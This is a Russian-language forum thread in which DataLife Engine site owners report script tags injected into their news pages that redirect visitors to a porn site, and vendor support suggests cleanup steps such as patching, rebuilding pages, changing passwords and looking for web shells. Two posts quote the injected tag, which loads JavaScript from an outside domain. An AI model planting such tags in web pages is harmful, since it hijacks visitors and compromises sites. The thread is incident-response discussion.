CMS DataLife Engine - Система управления сайтами

Sign in to follow this  
Stepller

C 6 сентября все страницы оказались с java-скриптом

Recommended Posts

Сегоня обнаружил в нвоостях вот такую шляпу она теперь делает редирект на порно сайт <script type="text/javascript" async="async" src="http://google-statistics.ru/js/ada67ce42f7e51433fdc45e523f90ff7.js"></script>

и она не во всех новостях!

Edited by qpool

Share this post


Link to post
Share on other sites

qpool,

Либо вы вычиститили первоначально не все новости, либо не поставили патч, либо после установки патча не сменили пароль к БД. Удалять JS скрипты из БД нужно перестроением новостей в админпанели скрипта.

Share this post


Link to post
Share on other sites

qpool,

Либо вы вычиститили первоначально не все новости, либо не поставили патч, либо после установки патча не сменили пароль к БД. Удалять JS скрипты из БД нужно перестроением новостей в админпанели скрипта.

заплатку поставил! новости все вычистил потому что скрипт то новый какой то ! пароли поменял вообще все на доступ VPS к базе , в админке все сменил везде разные! достали эти скрипты ))

Share this post


Link to post
Share on other sites

Произошла подобная проблема. Во все статьи вставили подобные вставки: <script async="async" type="text/javascript" src="http://google-statistics.ru/js/d072677d210ac4c03ba046120f0802ec.js"></script>

На одном и том же сервере, почему-то затронуло не все сайты, а некоторые. Может просто до них еще не добрались)

Везде поставил заплатку, почистил новости, поменял пароли. Надеюсь поможет.

Кстати, после перестроения новостей javascript удаляется из новостей, но он остается в статических страницах. Будьте внимательны и делайте перестроение стат. страниц тоже.

Edited by Aлександp

Share this post


Link to post
Share on other sites

Celsoft, я уже в 4 раз меняю все пароли, phpmyadmin в открытом доступе, ссылка на вход не стандарт, переделана! Также мой системный администратор сказал, что подборов паролей не было к phpmyadmin, сказал что 100% уязвимость в самом движке DLE.

Edited by chelnovosti_ru

Share this post


Link to post
Share on other sites

Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код(((

Share this post


Link to post
Share on other sites

Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код(((

После того как поставили заплатки вы пароли к БД меняли? Их менять нужно обязательно.

Share this post


Link to post
Share on other sites

Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код(((

После того как поставили заплатки вы пароли к БД меняли? Их менять нужно обязательно.

Конечно менял, все 4 раза, не помогает, сайт проверили на шеллы, их там нет. Остается только одно, где-то уязвимость в DLE((((

Share this post


Link to post
Share on other sites

Конечно менял, все 4 раза, не помогает, сайт проверили на шеллы, их там нет. Остается только одно, где-то уязвимость в DLE((((

Добавить JS код в новости через DLE невозможно, только напрямую в БД или минуя DLE через другие скрипты. Соответственно злоумышленник либо имеет прямой доступ к вашему аккаунту, а это не только пароли к БД, а например к хостингу, либо на вашем сервере есть шелл. Других вариантов нет. Шелл может быть не в отдельных файлах, а например встроен во внутренние файлы DLE. Поэтому полностью восстановите оригинальные файлы скрипта на сервере, убедитесь что патч действительно стоит, и смените все пароли, от БД, хостинга, админпанели DLE, FTP и т.д. Если на сервере несколько сайтов, то соответственно проделать все для всех сайтов.

Share this post


Link to post
Share on other sites

Что касается файлов, буквально вчера вечером перезалил архив версии 9.7 чистую, установил заплатку, и один фиг ломанули( Паролик к хостинг панели сменил, фтп пароль сменил, к базе сменил, везде 20-ти значный, однако, сегодня злоумышленник пытался пробраться в БД, спаслись тем, что сис админ сделал вход в БД только по моему ип адресу.

Share this post


Link to post
Share on other sites

chelnovosti_ru,

Предоставьте доступ по FTP и к админпанели скрипта, осмотрим визуально ваш сервер на предмет всего постороннего. Просто обновление не всегда решает проблему, потому как это может быть в незатрагиваемых файлах, например в файлах настроек или например шелл в картинках. Для 9.7 два патча, вы их оба установили?

Также проведите обновление серверного ПО, в первую очередь phpMyAdmin, на него много исправлений уязвимостей вышло.

Share this post


Link to post
Share on other sites

chelnovosti_ru,

Предоставьте доступ по FTP и к админпанели скрипта, осмотрим визуально ваш сервер на предмет всего постороннего. Просто обновление не всегда решает проблему, потому как это может быть в незатрагиваемых файлах, например в файлах настроек или например шелл в картинках. Для 9.7 два патча, вы их оба установили?

Также проведите обновление серверного ПО, в первую очередь phpMyAdmin, на него много исправлений уязвимостей вышло.

Отправил вам сообщения со всем данными для входа, которые вы просили.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this